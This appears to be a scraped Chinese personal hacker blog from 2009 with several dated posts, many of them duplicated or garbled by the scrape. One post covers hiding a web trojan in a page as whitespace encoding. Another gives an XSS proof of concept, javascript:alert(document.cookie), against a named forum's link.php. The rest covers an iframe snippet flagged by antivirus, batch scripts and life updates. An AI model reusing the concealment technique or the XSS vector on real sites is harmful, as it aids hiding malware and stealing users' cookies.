Aug
5
我们先看如下加密函数:
将一个包含任意字符的字符串转换为一个只包含空白字符的字符串,而这些空白字符实际上表示了原字符串中对应字符的字节流。一个空格表示1,一个制表符(Tab)表示0,而换行符则表示字节流的结束。例如:a = 空格 空格 制表 制表 制表 制表 空格开头 = 110001 = 97 .我们对一段网马进行加密后变成如下代码:
请注意,注释的中间关非空白,而是加密后的代码。我们将其代码放入网页中,然后使用解密函数进行解密:
function dehydrate(s) {
var r = new Array();
for (var i=0; i < s.length ; i++)
{
for (var j=6; j >= 0 ; j-- )
{
if (s.charCodeAt(i) & (Math.pow(2,j)) )
{
r.push(' ');
} else {
r.push('\t');
}
}
}
r.push('\n');
return r.join('');
}
var r = new Array();
for (var i=0; i < s.length ; i++)
{
for (var j=6; j >= 0 ; j-- )
{
if (s.charCodeAt(i) & (Math.pow(2,j)) )
{
r.push(' ');
} else {
r.push('\t');
}
}
}
r.push('\n');
return r.join('');
}
将一个包含任意字符的字符串转换为一个只包含空白字符的字符串,而这些空白字符实际上表示了原字符串中对应字符的字节流。一个空格表示1,一个制表符(Tab)表示0,而换行符则表示字节流的结束。例如:a = 空格 空格 制表 制表 制表 制表 空格开头 = 110001 = 97 .我们对一段网马进行加密后变成如下代码:
//startevil
//endevil
//endevil
请注意,注释的中间关非空白,而是加密后的代码。我们将其代码放入网页中,然后使用解密函数进行解密:
Aug
1
八挂,八挂! 欢迎各位淫客、浪客、白客、红客、荡客、漂客、剑客、黑客、绿客、紫客等来参观。。。
http://www.milw0rm.cn/
声明:纯属娱乐! 再送上一个批量处理PP的批处理:
http://www.milw0rm.cn/
声明:纯属娱乐! 再送上一个批量处理PP的批处理:
SETLOCAL ENABLEDELAYEDEXPANSION
for /f "tokens=*" %%i in ('dir /s /b *.jpg') do (
set /A t=!t!+1
ren "%%i" !t!.jpg
)
for /f "tokens=*" %%i in ('dir /s /b *.jpg') do (
set /A t=!t!+1
ren "%%i" !t!.jpg
)
Jul
31
link.php页面不是Dz论坛自带的,是nohack自己写的,虽然用 htmlspecialchars 函数进行处理了, php.ini配置里gpc也开了,虽然没办法通过闭合进行xss,但是nohack却忘记了javascript伪协议放在资源请求里面会被执行:
页面内容:
这种方式还是很多呀!!
http://www.nohack.cn/bbs/link.php?link=javascript:alert(document.cookie)
页面内容:
<iframe id="url_mainframe" frameborder="0" scrolling="yes" name="main" src="javascript:alert(document.cookie)" style="height: 100%; visibility: inherit; width: 100%; z-index: 1;overflow: visible;"></iframe>
这种方式还是很多呀!!
Jul
29
如下代码竟然定义为了病毒特征:
其中网址可为任意。。他们认为是这样的:
AntiVir 7.9.0.234 2009.07.28 HEUR/HTML.Malware
McAfee-GW-Edition 6.8.5 2009.07.29 Heuristic.HTML.Malware
document.write( "<iframe src='http://www.woyigui.cn/quicksearch.html' height='60px' scrolling='no' width='100%' frameborder='0'></iframe>" )
其中网址可为任意。。他们认为是这样的:
AntiVir 7.9.0.234 2009.07.28 HEUR/HTML.Malware
McAfee-GW-Edition 6.8.5 2009.07.29 Heuristic.HTML.Malware
Jul
24
有时候抓的包是不太方便看的,比如:
而且如上数据,有可能还是urlencode 的,那么可用批处理处理,然后用 urldecode 命令行工具进行输出:
其中 urldecode.exe 为解码操作的工具,解完之后,就是如此这般了,看的时候就一目了然:
不过此种方式只支持 http 数据包。
000 : 47 45 54 20 2F 69 6D 67 2F 75 62 62 2F 66 6F 6E GET /img/ubb/fon
010 : 74 2D 66 61 6D 2E 67 69 66 20 48 54 54 50 2F 31 t-fam.gif HTTP/1
020 : 2E 31 0D 0A 41 63 63 65 70 74 3A 20 2A 2F 2A 0D .1..Accept: */*.
030 : 0A 52 65 66 65 72 65 72 3A 20 68 74 74 70 3A 2F .Referer: http:/
...........
100 : 6C 25 32 30 57 65 73 74 65 72 6E 25 32 30 42 54 l%20Western%20BT
110 : 25 32 30 2D 25 32 30 25 45 36 25 38 30 25 41 37 %20-%20%E6%80%A7
120 : 25 45 35 25 39 30 25 41 37 25 32 30 25 37 43 25 %E5%90%A7%20%7C%
130 : 32 30 25 45 36 25 39 38 25 41 35 25 45 36 25 39 20%E6%98%A5%E6%9
140 : 41 25 39 36 25 45 38 25 38 41 25 42 31 25 45 35 A%96%E8%8A%B1%E5
150 : 25 42 43 25 38 30 25 32 30 25 45 36 25 38 30 25 %BC%80%20%E6%80%
010 : 74 2D 66 61 6D 2E 67 69 66 20 48 54 54 50 2F 31 t-fam.gif HTTP/1
020 : 2E 31 0D 0A 41 63 63 65 70 74 3A 20 2A 2F 2A 0D .1..Accept: */*.
030 : 0A 52 65 66 65 72 65 72 3A 20 68 74 74 70 3A 2F .Referer: http:/
...........
100 : 6C 25 32 30 57 65 73 74 65 72 6E 25 32 30 42 54 l%20Western%20BT
110 : 25 32 30 2D 25 32 30 25 45 36 25 38 30 25 41 37 %20-%20%E6%80%A7
120 : 25 45 35 25 39 30 25 41 37 25 32 30 25 37 43 25 %E5%90%A7%20%7C%
130 : 32 30 25 45 36 25 39 38 25 41 35 25 45 36 25 39 20%E6%98%A5%E6%9
140 : 41 25 39 36 25 45 38 25 38 41 25 42 31 25 45 35 A%96%E8%8A%B1%E5
150 : 25 42 43 25 38 30 25 32 30 25 45 36 25 38 30 25 %BC%80%20%E6%80%
而且如上数据,有可能还是urlencode 的,那么可用批处理处理,然后用 urldecode 命令行工具进行输出:
@echo off
rem code by woyigui
setlocal enabledelayedexpansion
for /f "tokens=19" %%i in (log.txt) do (
set a=!a!%%i
)
set /p b=!a: =!>>temp.txt<nul
for /f "tokens=*" %%i in ( temp.txt ) do urldecode.exe "%%i" >>results.txt
del /q temp.txt
rem code by woyigui
setlocal enabledelayedexpansion
for /f "tokens=19" %%i in (log.txt) do (
set a=!a!%%i
)
set /p b=!a: =!>>temp.txt<nul
for /f "tokens=*" %%i in ( temp.txt ) do urldecode.exe "%%i" >>results.txt
del /q temp.txt
其中 urldecode.exe 为解码操作的工具,解完之后,就是如此这般了,看的时候就一目了然:
GETt-fam.gif.1..Accept:.Referer:/xxx.xxx.com/index.php?c=tool&a=article&title=[d7db][rmvb/475M]Private
不过此种方式只支持 http 数据包。
Jul
18
最近google reader老出现:"抱歉,发生意外情况,阻碍了 Google 阅读器完成请求。",今天一搜,原来很多人这样情况,搜索引擎真强大。这问题我却没搜一下。Fuck gfw!
解决方法:
使用 https://www.google.com/reader 进行访问。
解决方法:
使用 https://www.google.com/reader 进行访问。
Jul
9
一个天大的笑话!昨天关了,今天又开了,难不成是一大黑客日掉写上几句话?记录之。。。
Jun
24
1、郑州这鬼天气,热的要命,快爆了。没空调,脱光衣服吹了一天风扇,头大的要命!已经发出红色警报了,气温达到 40 度,我快不行了。。。
2、明天学校领毕业证(有的人可以领到双学位证书了,一个毕业证,一个结婚证,详情见 3),后天开毕业大会!
3、前天去学校,同学变化可大!尤其是女生,应该是女人。有的被老公送去,有的是挺着肚子去的,好多美女都嫁人了,她们老公照片一瞅,我靠,吓人!晚上XXOO时,不把人压死才怪,不过人家有钱,开宝马,住楼房,同学也爱钱如命,没办法。像咱这种人,一没钱,二没长相,没人要,等咱也有钱了,再找女友吧。现在当男人很难。还有我们班一个女生,自己男友现在没什么好工作,奶奶的,就把我哥们甩了,真他妈的爱钱,虽然哥们现在没钱,但是刚毕业哪会有那么多钱呀,再说有钱了他会娶“你”吗??哎,不说了,社会就这样子,说了无益。
4、27 号回家呆几天,老妈估计想我了,五个姐姐们也专等着我回家,走亲戚呢。哈哈!
近期概况就这么多了。
2、明天学校领毕业证(有的人可以领到双学位证书了,一个毕业证,一个结婚证,详情见 3),后天开毕业大会!
3、前天去学校,同学变化可大!尤其是女生,应该是女人。有的被老公送去,有的是挺着肚子去的,好多美女都嫁人了,她们老公照片一瞅,我靠,吓人!晚上XXOO时,不把人压死才怪,不过人家有钱,开宝马,住楼房,同学也爱钱如命,没办法。像咱这种人,一没钱,二没长相,没人要,等咱也有钱了,再找女友吧。现在当男人很难。还有我们班一个女生,自己男友现在没什么好工作,奶奶的,就把我哥们甩了,真他妈的爱钱,虽然哥们现在没钱,但是刚毕业哪会有那么多钱呀,再说有钱了他会娶“你”吗??哎,不说了,社会就这样子,说了无益。
4、27 号回家呆几天,老妈估计想我了,五个姐姐们也专等着我回家,走亲戚呢。哈哈!
近期概况就这么多了。
